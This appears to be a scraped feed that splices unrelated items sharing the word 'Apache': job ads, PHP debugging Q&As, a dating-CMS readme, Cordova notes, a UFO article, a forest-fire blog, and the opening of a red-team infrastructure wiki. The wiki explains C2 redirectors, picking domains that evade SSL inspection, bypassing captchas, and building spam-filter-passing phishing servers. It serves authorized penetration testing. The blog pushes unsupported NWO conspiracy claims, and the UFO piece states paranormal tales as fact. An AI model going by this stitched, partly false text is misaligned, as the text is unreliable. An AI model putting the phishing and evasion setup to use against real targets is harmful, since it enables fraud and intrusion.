NC-CHARLOTTE, A leading Fortune 100 company is seeking a strong Java Developer Qualifications 6+ years of overall Java development experience Must have experience with the below technologies Java, J2EE JQuery, Bootstrap, JavaScript frameworks, EXT JS, Angular, React JavaScript, JSP, HTML, AJAX, CSS, HTTP SOAP, WSDL, XSD, JSON, Web services and XML Weblogic,JBOSS, Apache, Tomcat servers Must have understanding o
Xdebug never stops at my breakpoints Sublime Text

I've successfully installed Sublime Text and xdebug on my 64bit Win7 machine and installed the "The easiest Xdebug" plugin in Firefox. Sublime Text is running as Administrator, its project file sets the correct path and xdebug settings, and I have breakpoints only on lines with valid php code. WampServer is running correctly on http://localhost:8080/.

The xdebug package commands appear to work as designed, but the debugger never stops at my breakpoints. Starting or stopping the debugger within Sublime Text opens the correct HTML page in Firefox, although the page load is significantly slower than usual.

I've set up the xdebug log. Here's a sample.

Log opened at 2013-06-23 21:42:02
I: Connecting to configured address/port: localhost:9000.
I: Connected to client. :-)
-> <init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///C:/wamp/bin/php/firelogger/firelogger.php" language="PHP" protocol_version="1.0" appid="3948" idekey="sublime.xdebug"><engine version="2.2.3"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2013 by Derick Rethans]]></copyright></init>
<- breakpoint_set -i 1 -n 10 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\webroot\index.php
-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="1"><error code="1"><message><![CDATA[parse error in command]]></message></error></response>
<- breakpoint_set -i 2 -n 17 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php
-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="2"><error code="1"><message><![CDATA[parse error in command]]></message></error></response>
<- breakpoint_set -i 3 -n 18 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php
-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="3"><error code="1"><message><![CDATA[parse error in command]]></message></error></response>
<- run -i 4
-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="run" transaction_id="4" status="stopping" reason="ok"></response>
Log closed at 2013-06-23 21:42:04

For completeness, here's the xdebug section of my php.ini file ...

[xdebug]
zend_extension = c:\wamp\bin\php\php5.3.13\ext\php_xdebug-2.2.3-5.3-vc9-x86_64.dll
;xdebug.remote_enable = off
;xdebug.profiler_enable = off
;xdebug.profiler_enable_trigger = off
;xdebug.profiler_output_name = cachegrind.out.%t.%p
;xdebug.profiler_output_dir = "c:/wamp/tmp"
xdebug.remote_enable=1
xdebug.remote_host="localhost"
xdebug.remote_port=9000
xdebug.remote_handler="dbgp"
xdebug.remote_log=C:\wamp\bin\apache\apache2.2.22\logs\xdebug.log
xdebug.remote_mode=req
xdebug.profiler_enable=1
xdebug.profiler_output_dir="c:/wamp/tmp/"
xdebug.collect_params=On
xdebug.show_local_vars=On

... and the Sublime Text project file.

{
    "folders":
    [
        { "path": "/C/Users/work/My Projects/ElseApps/EAFF/code" }
    ],
    "settings":
    {
        "xdebug": { "url": "http://localhost:8080" }
    }
}

Sublime Text's status bar shows the following message after I click Start debugging and the page slowly loads:

Xdebug: Page finished executing. Reload to continue debugging.

Can anyone spot where I'm going wrong, or advise a useful path to diagnosing the problem?

The cause does appear to be the space in the path passed to Xdebug by Sublime Text's Xdebug package. The original query ...

<- breakpoint_set -i 3 -n 18 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php

... results in an error response ...

-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="3"><error code="1"><message><![CDATA[parse error in command]]></message></error></response>

... but a quick and nasty hack of the python source file (my first ever Python edit) sends this ...

<- breakpoint_set -i 1 -n 18 -t line -f file://C:\Users\work\MyProj~1\ElseApps\EAFF\code\approot\core\etc\eaff-index.php

... and gets this back ...

-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="1" id="39480001"></response>

... after which everything works as designed.

The short-term hack used to test this is at line 221 in Xdebug.py:

def uri(self):
    rawpath = os.path.realpath(self.view.file_name())
    outpath = rawpath.replace("My Projects", "MyProj~1")
    # return 'file://' + os.path.realpath(self.view.file_name())
    return 'file://' + outpath

I'll investigate further. I'd already deliberately set the 8.3 pathname in the Sublime Text project file, but that's not what's passed to Xdebug. If it were, there should be no problem.
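A more general fix than hard-coding one folder's 8.3 name would be to percent-encode the path when the URI is built, so any space survives the DBGp command parser. This helper is a sketch of that idea (it is not part of the Xdebug package, and whether Xdebug 2.2 accepts the encoded form should be verified against the DBGp protocol):

```python
import urllib.parse

def path_to_uri(rawpath):
    # Percent-encode unsafe characters (a space becomes %20) while keeping
    # '/', ':' and '\' literal so Windows drive letters and separators survive.
    return 'file://' + urllib.parse.quote(rawpath, safe='/:\\')
```

With that in place, breakpoint_set would receive file://C:\Users\work\My%20Projects\... instead of a path containing a raw space.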


Free Open Source Online Dating Software
pH7 Social Dating CMS: The Most Secure, Powerful & Professional Social Dating Web App Builder

pH7 Social Dating CMS is a professional, open-source social dating CMS with a fully responsive design; it is low-resource-intensive, powerful and very secure.

pH7CMS (now known as pH7Builder) ships with 35 modules and is based on its homemade framework (pH7Framework). It is also the first professional, free and open-source social dating site builder software, and the first choice for creating enterprise-level dating apps/services or social networking sites.


Free Open Source Online Dating Software
Software Overview

pH7 Dating CMS is a social/dating CMS written in object-oriented PHP (OOP), fully compatible with and highly optimised for PHP 7+, and based on the MVC architecture (Model-View-Controller).

It is designed with the KISS principle in mind, and all the source code can be read and understood in minutes. For better flexibility, the software uses the PDO (PHP Data Objects) abstraction, which allows a choice of database. Development follows the DRY principle (Don't Repeat Yourself), aimed at reducing repetition of information of all kinds (no duplicate code).

This free and open-source social dating site builder aims to be low-resource-intensive, powerful, stable and secure. The software also comes with 35 system modules and is based on pH7Framework (written specifically for this project), which has over 52 packages.

To summarize, pH7CMS gives you the perfect ingredients to create the best online dating service or social networking website on the World Wide Web!

How Powerful Your Social-Dating App Will Be? :rocket:

Best Dating Features:
  • Advanced Search
  • Blog
  • Notes
  • Pages Management
  • Friends/Mutual Friends, Visit, Messages, Instant messaging, Views, Like, Rating, Smileys, Geo Map, Avatar, Wallpaper, ...
  • Related Profiles (for better user experience and faster match)
  • Custom Profile (Background profile)
  • Comments
  • Hot or Not
  • Love Calculator
  • Matchmaking System
  • Geo-Location
  • People Nearby
  • Photo Albums
  • Videos (and possibility to upload videos from API v3 YouTube, Vimeo, Metacafe and Dailymotion)
  • Forums
  • Full Moderation of all contents posted by your users
  • Nudity Filter Option for all images uploaded by users
  • Dating Scammer Detector (see if profile photos aren't used by scammers)
  • Anti-Scam Tools
  • Watermark Branding
  • Chat Rooms
  • Chatroulette
  • Games (with high quality and viral games installed)
  • Webcam Shot
  • Affiliate
  • Newsletter
  • Activity Streams
  • User Mentions (using the “@” symbol with the username such as @pH-7)
  • Member Approval System
  • Advanced Admin Panel
  • Complete Membership System
  • Payment Gateways Integration for PayPal, Stripe, Braintree, Bitcoin and 2CheckOut
  • Statistics & Analytics System
  • Live Notification System
  • Registration delay (to avoid spam)
  • File Management
  • Dynamic Field Forms Management
  • Privacy Settings
  • Banner/Advertisement Management
  • User Dashboard
  • Dating-Style Profile Page
  • Fake Profile Generator
  • CSV User Importer
  • Support for Multiple Languages, Internationalization and Localization (I18N)
  • European and American Time/Date formats
  • Cache system for the database, pH7Tpl (our template engine), static files (HTML, CSS, JS), string content, ...
  • Maintenance Mode
  • Database Backup
  • Report Abuse
  • SEO-Friendly (Title, Content, Code, ...), Sitemap module, hreflang, possibility to translate each URL, ...
  • Multilingual URLs
  • Check that all UGC (User-Generated Content) are unique (to avoid spam and malicious users)
  • RSS Feed
  • Block easily any IPs, emails, usernames, affiliated bank accounts, etc.
  • Country Blocker (block easily any countries where you don't want your website to be accessible)
  • Country Restrictions for Member and Affiliate registration forms
  • Full API for integration from an external app (iOS/Android, ...), website, program, ...
  • Feedback
  • Fully Responsive Templates
  • Memberships/Groups Manager
  • Publishable easily into Android/iPhone/iOS webview mobile app thanks to its Mobile-Optimized Templates
  • Multiple themes and many customization possibilities
  • Message templates
  • Includes top HTML5 features
  • Allows signing in to your site with Facebook, Google and Twitter thanks to pH7CMS's Connect module
  • Invite Friends
  • Social Bookmark (Social Media Sharing Buttons)
  • Powerful Anti-Spam System
  • Full Security system against XSS, CSRF, SQL injection, authentication hacking, session fixation, brute-force, reverse tabnabbing phishing attacks, ... and can even prevent some DDoS attacks!
  • Two-Factor Authentication Option available for Admins, Users and Affiliates
  • Admin Panel - Block Access with IP Restriction
  • Beautiful Code: Very thoroughly commented about what's happening throughout the PHP code, beautiful indentation and very readable, even for non-programmers
  • Anyone can easily contribute to the pH7CMS project thanks to the GitHub repository

It is no accident that pH7CMS is considered the first choice for creating an enterprise-level dating web app or social networking website.

Features like these and many other unique and exclusive ones are waiting for you, already released in pH7CMS!


Free Open Source Online Dating Software
Requirements

Application Server: PHP 5.6 or higher (Recommended Version: PHP 7.0.4 or higher).

Database: MySQL/MariaDB 5.0.15 or higher.

Operating System: Linux/Unix (Red Hat, CentOS, Debian, FreeBSD, Mandrake, Mac OS, etc.), Windows.

Web Server: Apache with mod_php or with PHP in CGI/FastCGI mode (nginx, LiteSpeed and IIS should also work; you might have to change some pieces of code and change the URL rewriting to make it work).

URL rewriting extension module: Apache, nginx, LiteSpeed, IIS (for Web.config, you have a good tutorial here).

Specific Requirement: The server has to be connected to the Internet.

Minimum Web Space: 2.0 GB

pH7CMS's Video Module Requirement (only if enabled): FFmpeg

Installation

  • Github: Clone pH7CMS from Github with git clone git@github.com:pH7Software/pH7-Social-Dating-CMS.git. Install Composer, then from a command line opened in the folder, run composer install to install pH7CMS's dependencies.
  • Composer: Install Composer, then run composer create-project ph7software/ph7cms --prefer-dist ph7cms.
  • Sourceforge: Directly download the latest stable version from Sourceforge.
  • Softaculous: If your Web host offers Softaculous, you might be able to install pH7CMS in one click with Softaculous.

Nginx Configuration

In order to get pH7CMS working on nginx server, you need to add some custom nginx configuration.

Create /etc/nginx/ph7cms.conf and add the following:

location / {
    try_files $uri $uri/ /index.php?$args;
    index index.php;
}

Please note that the above code is the strict minimum; you can obviously add more rules by comparing with the main Apache .htaccess file.

Finally, in your nginx server configuration, you will have to include the ph7cms.conf file to complete the configuration, like below:

In a file such as /etc/nginx/sites-enabled/yoursite.conf for Ubuntu and other OSes based on Debian, or /etc/nginx/conf.d/yoursite.conf for CentOS and other OSes based on Red Hat:

server {
    # Port number. In most cases, 80 for HTTP and 443 for HTTPS
    listen 80;
    server_name www.yoursite.com;

    root /var/www/ph7cms_public_root;
    index index.php; # you can use index.ph7; for hiding the *.php ...

    client_max_body_size 50M;
    error_log /var/log/nginx/yoursite.error.log;
    access_log /var/log/nginx/yoursite.access.log;

    # Include ph7cms.conf. You can also directly add the "location" rule instead of including the conf file
    include /etc/nginx/ph7cms.conf;
}

For more information, please refer to the nginx documentation.


Free Open Source Online Dating Software
Translations

You can find and add other languages on the I18N repo .

Author

Coded & Designed with lots of :heart: by Pierre-Henry Soria . A passionate Belgian software engineer :chocolate_bar: :beer:

Hire Me At Your Company?

Do you need someone like me (and willing to relocate) at your company? Let's chat together!

Official Website

pH7CMS.com

Documentation

pH7CMS Documentation

Contributing
Free Open Source Online Dating Software

Anyone can contribute on pH7CMS GitHub repository!

Finding bugs, improving the CMS/doc or adding translations. Any contribution is welcome and highly appreciated!

Just clone the repository, make your changes and then make a push ;-)

WARNING, your code/modification must be of excellent quality and follow the Code Convention and PSR . I manually validate all the improvements and changes.

You will also become a pH7CMS VIP member and get all exclusive premium contents and upcoming modules.


Free Open Source Online Dating Software
Tools/Software Used to Develop pH7CMS

LAMP on Fedora/Ubuntu (and Windows/Mac with WampServer/MAMP for testing purpose)

Geany & Sublime Text for coding the whole project. That's it! However, since pH7CMS 5.0, PhpStorm (and sometimes Atom) are used as well.

GIMP for editing the assets, etc.

Trimage (and ImageOptim when developing on Mac) for compressing & optimizing the images

Poedit for translating the Gettext files

FileZilla for the FTP client

Git for the version control system

Sometimes, when working on Mac, Sequel Pro is used to lookup easily at a database.

Contact

You can send me an email for any suggestions or feedback at: hello {AT} ph7cms {D0T} com OR hi {AT} ph7 {D0T} me

pH7CMS; The Eco-Friendly CMS :heart:
Free Open Source Online Dating Software

pH7CMS has been built to reduce the power and CPU usage of your server in order to preserve nature and help save our environment.

pH7CMS's templates also use lighter colors since LCD monitors use less electricity to display them.

Finally, please consider using green Web hosting (which use Green Power supply).

-> Other 10 Easy Ways to Green Your Social Community :wink: <-

License

pH7CMS is under an Open Source Free License.

License: General Public License 3 or later; see the PH7.LICENSE.txt and PH7.COPYRIGHT.txt files for more details.


Free Open Source Online Dating Software
Free Open Source Online Dating Software

Global EDA Software Market Analysis 2018 | Growth by Top Companies: Cadence USA, Mentor Graphics USA, ALTIUM Australia, ZUKEN Japan, Synopsys USA, Magma Design Automation USA, Agilent EEsof USA, SpringSoft China Taiwan, ANSYS USA, Apache Design Solutions
(EMAILWIRE.COM, August 09, 2018 ) The global market size of EDA Software is $XX million in 2017 with XX CAGR from 2013 to 2017, and it is expected to reach $XX million by the end of 2023 with a CAGR of XX% from 2018 to 2023. Download Free Sample at. https://www.researchreportsinc.com/sample-request?id=67608...
Unable to access localhost or phpMyAdmin with WAMP

I'm running Apache v2.2.21, php v5.38, and mysql v5.5.16. The WAMP icon is green.

As the post title says, I can't access either localhost or phpMyAdmin from the WAMP systray icon menu, nor can I by typing http://127.0.0.1/index.php in a browser.

Clicking on either localhost or phpMyAdmin gives me the error message "Unable to connect - Firefox can't establish a connection to the server at 127.0.0.1."

I do have Skype and I know there are issues with Skype and WAMP port conflicts, so I quit Skype, and tried it, but got the same results.

At first the WAMP icon was always orange, but some searching here revealed that changing the listening port from the default 80 to 8080 in httpd.conf could fix it. That got the orange icon to go green.

Fixed it.

The last paragraph in my post was the key: I went into Skype and unchecked the "Use port 80 and 443 as alternatives for incoming connections." Then I went back into the httpd.conf file and changed "Listen 8080" back to the original "Listen 80".

Now both Skype and WAMP work properly.
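For anyone hitting the same conflict: before juggling ports, it can help to confirm that something else really is listening on port 80. A small Python sketch (standard library only, works on any OS):

```python
import socket

def port_in_use(port, host='127.0.0.1'):
    # Try a TCP connect: if it succeeds, some process (Skype, IIS, another
    # web server, ...) is already listening there and WAMP will stay orange.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        return s.connect_ex((host, port)) == 0
```

If port_in_use(80) returns True while Apache is stopped, another program owns the port.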


Java Developer - ALTA IT Services, LLC - Clarksburg, WV
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
Junior Full Stack Web Developer - Education Analytics - Madison, WI
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
Breaking changes coming to the iOS WebView in Apache Cordova

Uh oh.


Breaking changes coming to the iOS WebView in Apache Cordova - Apache Cordova

------------------------------------
Limitations of WKWebView

 

There are many limitations of WKWebview, especially if you were using UIWebView previously. The limitations are:

  1. Cookies don't persist. This is a WebKit bug, but someone has created a plugin for a workaround. See CB-12074
  2. Can't delete cookies. This is/was a WebKit bug (2015), we need to test for the iOS 11/12. See CB-11297
  3. Can't execute JavaScript code in the background. There are several issues related to this. See CB-12815
  4. XmlHttpRequests don't work because of a Cross-Origin Resource Sharing (CORS) issue. There is a workaround plugin created by Oracle (UPL licensed, which is Apache-2.0 compatible). See CB-10143
  5. Migration of localStorage from UIWebView. There is a migration plugin available. See CB-11974
  6. iframes will not be supported any longer (they are now CORS restricted in WKWebView), and may be partially or completely broken. This may lead to incompatibilities with the same code in other Cordova platforms.
  7. Known issues with WKWebView on iOS pre-11 which will be deprecated and dropped in a future Cordova release

There are several bugs that need to be resolved as well. The full list here: https://s.apache.org/QfsF

As you can see, WKWebView is not a direct drop-in replacement for UIWebView, you will need several plugins to patch functionality that is missing. There is also the local-webserver experimental plugin option, which will not be graduated to a full plugin -- we will concentrate our efforts on supporting the main WKWebView engine plugin.

Hopefully with more testing, and filing of bug reports with Apple for missing features, the WKWebView can be a full replacement for Cordova users.


Developer - JM Group - Montréal, QC
Digital : Apache Spark, Digital : Scala Database DB2, Sybase or Oracle SDLC, & AGILE Desired Skills Front office back office report experience Order Mgmt...
From JM GROUP - Mon, 30 Jul 2018 17:28:22 GMT - View all Montréal, QC jobs
Forest fires in history
I lived in New Mexico when that state had several terrible fires, including the one that almost burnt the city of Los Alamos.

Luckily it spared us that time (a fire a few years earlier burnt a canyon nearby) but I was bemused to see signs: No smoking outdoors (they allowed smoking inside only).

So my sympathy is with those in the California fires.  Expect lots of finger pointing for blame, but short of stopping people from living in forested areas, there is not much you can do.

Burning off the underbrush helps (unlike eastern forests, the dead wood seems to sit there and doesn't rot for years, probably because it is dry). However, the Los Alamos fire was caused by a fire started to burn off the underbrush to stop a future fire: they miscalculated.

Our local Apache tribe had trained firefighters that would go out every year to fight fires. They would start training early in the year, and often would be called up for months. We didn't lose any firefighters when I was there, but they often came back with the worst cases of fungus toes due to sweating feet inside their boots.

And some of our fighters were young women: but if you know Apache history, you don't mess with Apache women.

If you let the forest burn, locals will complain, but this is how forests renew themselves: new trees and plants will come up. If you stop the fires, that means a hotter, larger fire next time.

However, the largest fire in the West was in 1910: the Devil's Broom fire, which covered northern Idaho and surrounding states and killed 87 people.

The National Park Service site has a list of major recorded fires, mostly in the USA.

The worst fire on their list was the Peshtigo, Wisconsin fire of 1871, which killed almost 1,200 people. Few people have heard about it, because it happened at the same time as the great Chicago fire.

Wikipedia has a list of fires worldwide.

In many places, old dry grass is burnt off so that the new tender grass will sprout, or so farmers can plant crops more easily.  The farmers in Africa did this when they moved to a new field (after the older fields became exhausted) and the Native Americans also set fire to clear the grass. Ditto for Asia. But usually these fires are started when rain will limit the damage (at the start of the rainy season, when planting is done) and are more grass than forest fires.

Global warming will be blamed for all of this, and fingers pointed to Trumpieboy.

Yet the increase in global temperature has been going on for 100 years and Trumpie boy has only been in charge for 2.

And although the US refuses to bow and obey the NWO bosses who want to order people around, one tiny fact is that, unlike in Europe, the US carbon footprint has gone down in recent years, due to the use of natural gas from fracking.

Yes, I support sustainable living. But the religion of global warming is used to manipulate people into accepting a UN dictatorship that will tell you how to live for your own good (and maybe order you to die for the good of the world, although they usually hide that beneath fancy language).


Junior Software Engineer - Leidos - Morgantown, WV
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Leidos has job opening for a Junior Software Engineer in Morgantown, WV....
From Leidos - Wed, 25 Jul 2018 12:47:39 GMT - View all Morgantown, WV jobs
Apache mode not working
Hello. When I set the plugin to Apache mode, it does not work: it should write the rules to the .htaccess file, but this is not happening.
Put wamp 3.1.3 online
Hello, I would like to put wamp 3.1.3 online so that it is accessible from the net. Thanks. (Budget: €250 - €750 EUR, Jobs: Apache, PHP)
"WHAT? ... ANOTHER CUBE?" -> THE TEXAS BLACK CUBES ... A 2nd PHOTO-
The first picture of the appearance of an unidentified black cube over Texas.

 

"Another Cube..." 

The 2nd Black Cube photo

By Mary Alice Bennett

(Copyright 2015, Mary Alice Bennet - All rights Reserved)

<Edited by Robert D. Morningstar>

*******

Michael Nielson: -> "Another cube reportedly seen in Texas.  Its either the vanguard of the Borg assimilation fleet or its a kite flown by the Borgmans.  My question is simple:

 "Why would an advanced race of beings travel 100-trillion miles just to hover in the clouds over McAllen, Texas in their decidedly poorly aerodynamic cube?

Why not a sphere?

 Are they here for our spherical technology...or...the TexMex....?"

 

*******

The 1st "Black Cube" Photo.

The black color of this perfect cube reminds me of the color worn by mourners, and of the fact that we are missing our editor Dirk. Is this phenomenon a tribute to him? The manifestation of the shape out of the atmosphere reminds me of the paranormal activities in Uintah, Utah at Skinwalker Ranch:

Paranormal Corridor - Southwest USA, by Mary Alice Bennett

Skinwalker Ranch

"Using infrared binoculars, a researcher in Utah was able to observe a large black animal crawling through a tunnel into our dimension. The ape-like creature moved along using its elbows. After exiting and sauntering off into the night, the anomalous yellow light which contained the tunnel slowly faded away. This is but one of the events which occurred on the Skinwalker Ranch property while paranormal researchers were there. The tunnel appeared after a meditation session.

After another earlier attempt at meditating, an energy field was seen to swoop down upon the seated fellow. It uttered an animal roar as it sped by - the meditator was completely terrified. The researchers compared what they`d seen to the invisible force scene from the movie "Predator". Some of the other creatures who populate the Uintah Basin in N.E. Utah are only detectable because they block out the stars or by the enormous foot or claw prints that they leave behind. The rancher and his family had moved there in good faith, bringing their expensive herd of Angus cattle to the property. They lost so many cows there that they eventually had to leave, allowing the research team to take their place. Whatever is there does not allow domesticated livestock to pollute its sacred ground. Previous tenants had been warned not to try to dig anywhere on the land. In the 1770s the exploring Spanish had noticed underground activity there along with flying lights. The Ute tribe has 15 generations of tales to tell. There are deposits of the rare hydrocarbon Gilsonite on the ranch.

The UFO underground mining activity is similar to the situation in Pine Bush, New York. Large black flying triangles are seen in both areas. The rancher had seen a craft entering the atmosphere through a hole in the sky. At night he was able to see blue sky through one of these openings, as if it were the entrance to another world. There was another tunnel up there whose entrance opened directly opposite their homestead. Many of the sightings of anomalous creatures were one-time events, as if the animals were just passing through our dimension. When they first came to the land, the rancher`s wife was greeted at the gate by an oversized wolf that had to lean down in order to gaze into her car window. This sighting is reminiscent of the paranormal black dog of Norfolk, England which inspired the Sherlock Holmes mystery, "The Hound of the Baskervilles". "Black Shuck" as they call him, once appeared in a church, killing two people on his way out. The burn marks he left as he retreated are still visible on the doorway. There had been no repopulation of wolves to the Uinta region.

Soon after this encounter, the rancher`s wife observed what seemed to be an RV out in the field. There was a dark figure seated behind a desk inside. When he stood up, he took up the entire doorway. He was wearing a black helmet with a visor, black clothes and boots. The next day she and her husband went out to the field. When she saw the 18" bootprints he`d left behind, she became hysterical. The RV-type craft has also been seen in Brazil where they are called "chupas". These UFOs have been known to hunt the Amazonian hunters who wait in the trees at night for animals to pass by. A darting red light chased the horses off a cliff one night resulting in serious injuries. Sometimes the animals were seen to panic from the presence of invisible creatures.

The rancher advised the research team to stalk the phenomenon as if it were a wild animal.  He`d observed a multicolored craft one night which lit up the snow with its colorful lights.  When a twig broke, the craft turned off its lights and turned towards him.  The rancher thought that this was the type of reaction that one would expect from a living creature.  In Dulce, New Mexico, sightings of enormous UFOs are not uncommon.  One huge manta-ray shaped ship appeared to be covered with the skin of a sea creature.   It was grey, dimpled, and wrinkled.   A little ET was spotted with the same sort of skin.

Some theorize that the craft themselves are alive. This echoes the words of Ezekiel in his first chapter, the famous Biblical UFO encounter.  Ezekiel refers to the "wheel within a wheel" form of the "Throne of God" and to the "living creatures," which accompany the wheels flying in the sky.

The area of N.W. New Mexico is also famous for its suit-wearing "Wolfmen" and ghastly-faced " ghost runners," which have been known to keep pace with the patrol cars of the Highway Patrol.

How do you know whether it was a Bigfoot who raided your garden?

Answer: Only the fruit on the top of the tree is gone.

Last week, there was a sighting of a white Bigfoot up in Fort Apache, Arizona.  Since these animals are known to appear on or near Indian reservations, the news was not a surprise.  The author would like it noted that all of the examples used in this article were taken from the book "The Hunt for the Skinwalker" (available on Amazon), but the comparisons were not.

 

The appearance of a large black Bigfoot from a conduit coming out of the sky in Utah is similar to the manifestation of the black cubes from the clouds over Texas.

"What is Gilsonite?"

"Gilsonite is a natural, resinous hydrocarbon found in the Uintah Basin in northeastern Utah; thus, it is also called Uintahite.  This natural asphalt is similar to a hard petroleum asphalt and is often called a natural asphalt, asphaltite, uintaite, or asphaltum.  Gilsonite is soluble in aromatic and aliphatic solvents, as well as petroleum asphalt.  Due to its unique compatibility,  Gilsonite is frequently used to harden softer petroleum products.  Gilsonite in mass is a shiny, black substance similar in appearance to the mineral obsidian.  It is brittle and can be easily crushed into a dark brown powder.  When added to asphalt cement or hot mix asphalt in production,  Gilsonite helps produce paving mixes of dramatically increased stability."

This dramatic event and this article memorialize for me our much esteemed and greatly missed editor Dirk. 

IN MEMORIAM: -> DIRK VANDER PLOEG, UFO DIGEST PUBLISHER, PASSES on JUNE 26TH, 2015

Mary Alice Bennett

July 27th, 2015

Extra information about the article: 
Some comparative information concerning a recent paranormal phenomenon in the sky over Texas.
Categories: 

          Apache to Form Midstream Business in Deal With 'Blank-Check...
 By Josh Beckerman 

Apache Corp. (APA) is forming Permian Basin midstream energy business Altus Midstream Co. via a deal with a blank-check company, contributing nearly all of its gathering, processing and transportation assets at the Alpine High formation in West Texas.

Kayne...

          Running PHP from the Ubuntu terminal

Running PHP from the Ubuntu terminal

Reply to: running PHP from the Ubuntu terminal

With my own answer I just found the problem, haha.

A little over a year and a half ago I migrated the whole site to another server, which came with PHP 7.0 by default. But since some PHP functions were crashing on me, and to avoid going crazy updating the code of the ENTIRE site, I looked for a command to downgrade to 5.6 and thus get functions "obsolete" in PHP 7 to run in the browser. The thing is that the command I used (as far as I understand) only worked so that apache b...

Published on August 8th, 2018 by stty

          Red-Team-Infrastructure-Wiki/README.md at master · bluscreenofjeff/Red-Team-Infrastructure-Wiki · GitHub

This wiki is intended to provide a resource for setting up a resilient Red Team infrastructure. It was made to complement Steve Borosh (@424f424f) and Jeff Dimmock's (@bluscreenofjeff) BSides NoVa 2017 talk "Doomsday Preppers: Fortifying Your Red Team Infrastructure" (slides)

If you have an addition you'd like to make, please submit a Pull Request or file an issue on the repo.

THANK YOU to all of the authors of the content referenced in this wiki and to all who contributed!

Functional Segregation

When designing a red team infrastructure that needs to stand up to an active response or last for a long-term engagement (weeks, months, years), it’s important to segregate each asset based on function. This provides resilience and agility against the Blue Team when campaign assets start getting detected. For example, if an assessment’s phishing email is identified, the Red Team would only need to create a new SMTP server and payload hosting server, rather than a whole team server setup.

Consider segregating these functions on different assets:

  • Phishing SMTP
  • Phishing payloads
  • Long-term command and control (C2)
  • Short-term C2

Each of these functions will likely be required for each social engineering campaign. Since active incident response is typical in a Red Team assessment, a new set of infrastructure should be implemented for each campaign.

Using Redirectors

To further resilience and concealment, every back-end asset (i.e. team server) should have a redirector placed in front of it. The goal is to always have a host between our target and our backend servers. Setting up the infrastructure in this manner makes rolling fresh infrastructure much quicker and easier - no need to stand up a new team server, migrate sessions, and reconnect non-burned assets on the backend.

Common redirector types:

  • SMTP
  • Payloads
  • Web Traffic
  • C2 (HTTP(S), DNS, etc)

Each redirector type has multiple implementation options that best fit different scenarios. These options are discussed in further detail in the Redirectors section of the wiki. Redirectors can be VPS hosts, dedicated servers, or even apps running on a Platform-as-a-Service instance.

Sample Design

Here is a sample design, keeping functional segregation and redirector usage in mind:

Sample Infrastructure Setup

Further Resources

Perceived domain reputation will vary greatly depending on the products your target is using, as well as their configuration. As such, choosing a domain that will work on your target is not an exact science. Open source intelligence gathering (OSINT) will be critical in helping make a best guess at the state of controls and which resources to check domains against. Luckily, online advertisers face the same problems and have created some solutions we can leverage.

expireddomains.net is a search engine for recently expired or dropped domains. It provides search and advanced filtering, such as age of expiration, number of backlinks, number of Archive.org snapshots, SimilarWeb score. Using the site, we can register pre-used domains, which will come with domain age, that look similar to our target, look similar to our impersonation, or simply are likely to blend in on our target’s network.

expireddomains.net

When choosing a domain for C2 or data exfiltration, consider choosing a domain categorized as Finance or Healthcare. Many organizations will not perform SSL middling on those categories due to the possibility of legal or data sensitivity issues. It is also important to ensure your chosen domain is not associated with any previous malware or phishing campaigns.

The tool CatMyFish by Charles Hamilton(@MrUn1k0d3r) automates searches and web categorization checking with expireddomains.net and BlueCoat. It can be modified to apply more filters to searches or even perform long term monitoring of assets you register.

Another tool, DomainHunter by Joe Vest (@joevest) & Andrew Chiles (@andrewchiles), returns BlueCoat/WebPulse, IBM X-Force, and Cisco Talos categorization, domain age, alternate available TLDs, Archive.org links, and an HTML report. Additionally, it performs checks for use in known malware and phishing campaigns using Malwaredomains.com and MXToolBox. This tool also includes OCR support for bypassing the BlueCoat/WebPulse captchas. Check out the blog post about the tool's initial release for more details.

Yet another tool, AIRMASTER by Max Harley (@Max_68) uses expireddomains.net and Bluecoat to find categorized domains. This tool uses OCR to bypass the BlueCoat captcha, increasing the search speed.

If a previously-registered domain isn't available or you would prefer a self-registered domain, it's possible to categorize domains yourself using the direct links below or a tool like Chameleon by Dominic Chell (@domchell). Most categorization products will overlook redirects or cloned content when determining the domain's categorization. For more information about Chameleon usage, check out Dominic's post Categorisation is not a security boundary.

Finally, make sure your DNS settings have propagated correctly.

Categorization and Blacklist Checking Resources

Easy Web-Based Phishing

The words easy and phishing never really seem to go together. Setting up a proper phishing infrastructure can be a real pain. The following tutorial will provide you with the knowledge and tools to quickly set up a phishing server that passes most spam filters to date and provides a RoundCube interface for an easy phishing experience, including two-way communication with your target. There are many setups and posts out there regarding phishing; this is just one method.

Once you have a domain that passes the proper checks listed in the previous section and have your phishing server spun-up, you'll need to create a couple "A" records for your domain as pictured.

DNS Setup

